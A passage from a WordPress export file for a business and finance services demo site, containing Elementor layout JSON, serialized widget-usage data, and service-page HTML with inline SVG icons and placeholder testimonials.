		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"50913d0","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6431d9b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"2d79a54","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"d6f8efd","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"403e7f7","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"53a4218","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"40e4f84","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"33cde09","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"99d507e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"8bc24d4","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"beb742d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3c860b2","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"44fef9d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"5e5c00d","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true},{"id":"89aa30f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"d6a51ae","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"edcdae5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9ec60d8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"880ea70","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"e248180","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"ec9ed31","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"6dc6dd7","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"7a91f5f","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5e9f9e9","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a13a110","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box5.jpg","id":906},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","label_link":"Explore More","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"5df37f4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1cb357c","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box6.jpg","id":907},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","label_link":"Explore More","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"da8c1a3","elType":"section","settings":{"background_background":"classic","background_color":"#F8F8F8","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-grid.jpg","id":878},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","background_bg_width_tablet":{"unit":"px","size":0,"sizes":[]},"padding":{"unit":"px","top":"150","right":"0","bottom":"120","left":"0","isLinked":false},"gap":"extended","structure":"20","background_position_tablet":"center right","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e17a0cf","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[],"isInner":false},{"id":"46be8a0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"b31309c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","stitle_color":"#95A2AC"},"elements":[],"widgetType":"iheading"},{"id":"1cb8d1d","elType":"widget","settings":{"align":"left","testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"","id":""},"tname":"Oliver Simson","tjob":"client of company","_id":"4071f49"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Mary Grey","tjob":"client of company","_id":"0a8366e"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Samanta Fox","tjob":"client of company","_id":"aeffe7c"}],"dots_style":"vertical","dots_spacing":{"unit":"px","size":-300,"sizes":[]},"dots_spacing_tablet":{"unit":"px","size":-70,"sizes":[]},"_margin":{"unit":"%","top":"0","right":"-5","bottom":"0","left":"0","isLinked":false},"arrow_align":"bottom","_padding_tablet":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"job_color":"#8D8D8D","job_typography_typography":"custom","job_typography_font_family":"Raleway","job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"job_typography_font_weight":"500"},"elements":[],"widgetType":"itestimonials2"}],"isInner":false}],"isInner":false},{"id":"1ce3e2f","elType":"section","settings":{"background_background":"classic","background_color":"#52C5B6","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fe015a4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"719b6b2","elType":"widget","settings":{"image_carousel":[{"_id":"e5f9d6d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"5966eb5","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"d89b073","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"6663b67","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"23bce51","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"70a824d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}}],"tshow":"6","tshow_tablet":"3","dots":"false","img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:6:{s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:10;}}s:8:"advanced";a:1:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:8:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;s:12:"stitle_color";i:2;s:29:"stitle_typography_font_weight";i:2;s:29:"stitle_typography_font_family";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:5;}s:14:"section_layout";a:2:{s:6:"layout";i:4;s:3:"gap";i:4;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:8:{s:21:"background_background";i:3;s:16:"background_color";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:26:"background_bg_width_tablet";i:1;s:26:"background_position_tablet";i:1;}}}}s:10:"iimage_box";a:3:{s:5:"count";i:8;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:8;s:4:"link";i:8;s:5:"title";i:7;s:3:"des";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:10:"radius_box";i:8;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:5:"align";i:1;s:12:"testi_slider";i:1;s:10:"dots_style";i:1;s:11:"arrow_align";i:1;}}s:5:"style";a:2:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_tablet";i:1;}s:11:"style_tinfo";a:5:{s:9:"job_color";i:1;s:25:"job_typography_typography";i:1;s:26:"job_typography_font_family";i:1;s:24:"job_typography_font_size";i:1;s:26:"job_typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:2:{s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Services With Icon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/services-with-icon/</link>
		<pubDate>Fri, 11 Sep 2020 10:16:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=885</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    